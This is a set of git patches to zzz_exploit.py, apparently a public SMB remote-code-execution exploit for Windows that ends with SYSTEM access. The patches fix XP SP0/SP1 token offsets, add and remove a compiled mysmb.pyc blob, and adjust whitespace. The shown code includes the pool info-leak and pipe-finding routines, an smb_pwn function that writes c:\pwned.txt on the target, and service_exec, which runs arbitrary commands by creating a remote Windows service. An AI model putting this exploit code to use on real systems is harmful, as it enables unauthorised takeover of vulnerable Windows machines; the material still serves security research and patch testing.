From 078d156a0d6a76590b9073fbb08439031dd1d6e4 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:32:20 -0700 Subject: [PATCH 1/9] fix offsets on XP SP0 and SP1 --- mysmb.pyc | Bin 0 -> 16693 bytes zzz_exploit.py | 120 ++++++++++++++++++++++++++----------------------- 2 files changed, 65 insertions(+), 55 deletions(-) create mode 100644 mysmb.pyc 
diff --git a/mysmb.pyc b/mysmb.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c72fbe7fd06d08f3ed4276e128df596f68984605 GIT binary patch literal 16693 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 L0!J5ziv#})ezMr2 literal 0 HcmV?d00001 diff --git a/zzz_exploit.py b/zzz_exploit.py index 47b418d..46f8ead 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -87,7 +87,7 @@ struct SrvSecContext { } SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user. -It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns STATUS_SUCCESS when Token is NULL. @@ -154,6 +154,8 @@ WINXP_32_SESSION_INFO = { 'PCTXTHANDLE_TOKEN_OFFSET': 0x24, 'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c, 'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68, + 'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 0x40, + 'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 0x5c } WIN2K_32_SESSION_INFO = { @@ -285,7 +287,7 @@ def wait_for_request_processed(conn): def find_named_pipe(conn): pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] - + tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$') found_pipe = None for pipe in pipes: 
@@ -295,7 +297,7 @@ def find_named_pipe(conn): found_pipe = pipe except smb.SessionError as e: pass - + conn.disconnect_tree(tid) return found_pipe @@ -306,7 +308,7 @@ def reset_extra_mid(conn): global extra_last_mid, special_mid special_mid = (conn.next_mid() & 0xff00) - 0x100 extra_last_mid = special_mid - + def next_extra_mid(): global extra_last_mid extra_last_mid += 1 @@ -322,7 +324,7 @@ def leak_frag_size(conn, tid, fid): # this method can be used on Windows Vista/2008 and later # leak "Frag" pool size and determine target architecture info = {} - + # A "Frag" pool is placed after the large pool allocation if last page has some free space left. # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version. # To make exploit more generic, exploit does info leak to find a "Frag" pool size. @@ -330,7 +332,7 @@ def leak_frag_size(conn, tid, fid): mid = conn.next_mid() req1 = conn.create_nt_trans_packet(5, param=pack(' 4: + print("Bad TOKEN offsets detected, performing workaround") + userAndGroupCount = unpack_from(' Date: Mon, 29 Jan 2018 18:34:24 -0700 Subject: [PATCH 2/9] remove .pyc file --- mysmb.pyc | Bin 16693 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 mysmb.pyc 
diff --git a/mysmb.pyc b/mysmb.pyc deleted file mode 100644 index c72fbe7fd06d08f3ed4276e128df596f68984605..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16693 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 L0!J5ziv#})ezMr2 From 434b7a3eb38785cc70c858ff87dd558d41661aa1 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:38:22 -0700 Subject: [PATCH 3/9] restore line starts --- zzz_exploit.py | 111 ++++++++++++++++++++++++------------------------- 1 file changed, 55 insertions(+), 56 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 46f8ead..e9f5996 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -87,7 +87,7 @@ struct SrvSecContext { } SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user. -It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns STATUS_SUCCESS when Token is NULL. @@ -287,7 +287,7 @@ def wait_for_request_processed(conn): def find_named_pipe(conn): pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] - + tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$') found_pipe = None for pipe in pipes: 
@@ -297,7 +297,7 @@ def find_named_pipe(conn): found_pipe = pipe except smb.SessionError as e: pass - + conn.disconnect_tree(tid) return found_pipe @@ -308,7 +308,7 @@ def reset_extra_mid(conn): global extra_last_mid, special_mid special_mid = (conn.next_mid() & 0xff00) - 0x100 extra_last_mid = special_mid - + def next_extra_mid(): global extra_last_mid extra_last_mid += 1 @@ -324,7 +324,7 @@ def leak_frag_size(conn, tid, fid): # this method can be used on Windows Vista/2008 and later # leak "Frag" pool size and determine target architecture info = {} - + # A "Frag" pool is placed after the large pool allocation if last page has some free space left. # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version. # To make exploit more generic, exploit does info leak to find a "Frag" pool size. @@ -332,7 +332,7 @@ def leak_frag_size(conn, tid, fid): mid = conn.next_mid() req1 = conn.create_nt_trans_packet(5, param=pack(' 4: @@ -897,7 +896,7 @@ def exploit(target, pipe_name): # ================================ # do whatever we want as SYSTEM over this SMB connection - # ================================ + # ================================ try: smb_pwn(conn, info['arch']) except: @@ -920,13 +919,13 @@ def exploit(target, pipe_name): def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() - + print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C$') fid2 = smbConn.createFile(tid2, '/pwned.txt') smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2) - + #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session @@ -943,7 +942,7 @@ def service_exec(conn, cmd): import random import string from impacket.dcerpc.v5 import transport, srvs, scmr - + service_name = ''.join([random.choice(string.letters) for i in range(4)]) # Setup up a DCE SMBTransport with the connection already in place 
@@ -955,7 +954,7 @@ def service_exec(conn, cmd): print("Opening SVCManager on %s....." % conn.get_remote_host()) resp = scmr.hROpenSCManagerW(rpcsvc) svcHandle = resp['lpScHandle'] - + # First we try to open the service in case it exists. If it does, we remove it. try: resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00') @@ -966,11 +965,11 @@ def service_exec(conn, cmd): # It exists, remove it scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle']) scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle']) - + print('Creating service %s.....' % service_name) resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00') serviceHandle = resp['lpServiceHandle'] - + if serviceHandle: # Start service try: @@ -982,7 +981,7 @@ def service_exec(conn, cmd): #scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP) except Exception as e: print(str(e)) - + print('Removing service %s.....' % service_name) scmr.hRDeleteService(rpcsvc, serviceHandle) scmr.hRCloseServiceHandle(rpcsvc, serviceHandle) From c915c66d79fb372f2f115c4744d049adbfcba1aa Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 18:54:30 -0700 Subject: [PATCH 4/9] more complex fix --- mysmb.pyc | Bin 0 -> 16693 bytes zzz_exploit.py | 14 +++++++++----- 2 files changed, 9 insertions(+), 5 deletions(-) create mode 100644 mysmb.pyc 
diff --git a/mysmb.pyc b/mysmb.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c72fbe7fd06d08f3ed4276e128df596f68984605 GIT binary patch literal 16693 zcmeHO+iz9bd0+dSW8>p1g8}1#0mBS4XP68aPbV}}n2a%IAb|r}#}k4(>CWNoZTpyW z@tnO60|`W_jMPMmS}6~CXr*4#i;}cyqfUBLTdApP!3kec!&> z7%+$FB&veh%WHjW?REL?-?z5&|2Z;f{;9oKGts{Se!qn$7;ud7@ZT{FW15axbWAg6 z7IVfSG-n!l(=3?9g0}Of(Px_dX0cz}1=HAJ7I(-Ds1KOM0psV zc_SRr-?etD<=4V`yHx_xOju;mskVZ(b|+L&0id;N?Pj^g5qvnu9G+kb#a%)4B+&XM zt9dhtW#2r@dY_p*TPgKpP+2CP?{wOoxwhxmcLF9Lx8nzX=a%o)2M8KOp`#krASj__ z(oF<@V@W}T2QQ*HvC?k(C%))++CjHDeS7-Eay>k8xpMN~lM0apo#4dYl@_6Vw#%V!sO@Ty>=;sY~YwR6Y4TJ2Pue&~0C8sFeQBIzt1 z*@6$g0O1EoRd1N|^FZM-(g_q=0{i5Qt(10Qd^nC`p&eEm$)t1bZYvCk;?oz-OoyZK zfOFNbs(sw&=?l`c@vU$SJqhT_(o*1u;hrq)Ts>H8RBL|IZ-s*GWL7~mThVKz2b$X4?*Oha) zZnN!m8*Gv?LD=cm!fwY;c|~eZz%Z8c$mY1A{#@S4{)Ep1xRG6E9?37nq43Mgs6_m- z6|+E)y>YWtj97+}yAl63gL+G>TjJRgvzFVn+^!|gM9$A&Joi&bL^8D9iy~zP($!Kz zEG5M9;7>t3%D{7Y0?xRZczGv$0br1?ys%w)C)S02A44UgUq;52Y#vlIlrq#Y6!Bn0 z!hLu_n9@dS?qtvh&}+e&BS)09BHovTu$w5V=(%)edNXOsobh}!I_m71X{9t5Oqa+| zU)NDU%0-tHAOf5nA>x|_q{530=}W2bMzf^C8v#<`Os$jSKI5jVQIa)s1{3yiLIAmkA)E{{P$HSjbrfoO6JrvnULis2Q!Hrp>*NRQ z2sPp_Ak2iU(sI-fqoTH&RBiaJ5-}~>S{#bGrYG8ZEwQKau7`I+%0#Puwd#d*7TRjc z$ma4UrV$rE7>2f}mtA_Vm$@>%3ub zmIz9QYrRAyW`^yMVb$y~kdxeyC-KN3>d970#9P_Y5wg#62c+la>g}`Lr6s>psejQI z-IG8{0~|!Mz*VS*AsChbN`KjZA1d)G+&nlD2LWhz>dW<(n}xe68U!o#pxz3?YOCgl zFX0WmU-5$gu4KgzyKA#8?{n__?a*&|zL)W$#0hG&IeD@%*(z7vYL1jERqqH}v8X9Y zdgF&9nBXCYb648!o33o}vltZ+KPESx+v_~z;K?U`a6*3C15l^`L|6R+L1?u@Du|UZ$%_&}VG_7U#pr(oM*!7l7U5vWa1I_a_YufR zsHN~|FoG%!hK+vF_+w@jt~drGvdS~Ef`88K!Px>(2aL~M7GK)l;3G1)^pJI*mvvu$Nbd{Md(3!8g?z6tmZP?lcvT#V0$LOp zaVY)-6_{)&09OQp710E%un2(U%v%H%s1R2BDIi{f`kX)rg_!5n9j1`K>6rEcr395$ z&g7iVO%5uc6B2VOhtX6f;=8zzBCP;*T0uA}D#?WdGh$Xp&FUCmhw-4L8K5_@o_ClJ zsg!7F)eAtL04Mt~40wI2jKaKyV&^QIu=Zj(!g|whcf%5WgOCokE84+zyMgbv!bbDf zj2INx^OvgK2JCI!gCc}M3B-mY3||9;NOM^s<`8y!?WRo6YCVcpUE}~lw~0Y?SlzXo zp}W+mE(bGW)wGwhbN|{}s(W?@EsYTo{Ldl1p+*j8qIHR)$9k(Cx^9WPuwqZRLdS2m 
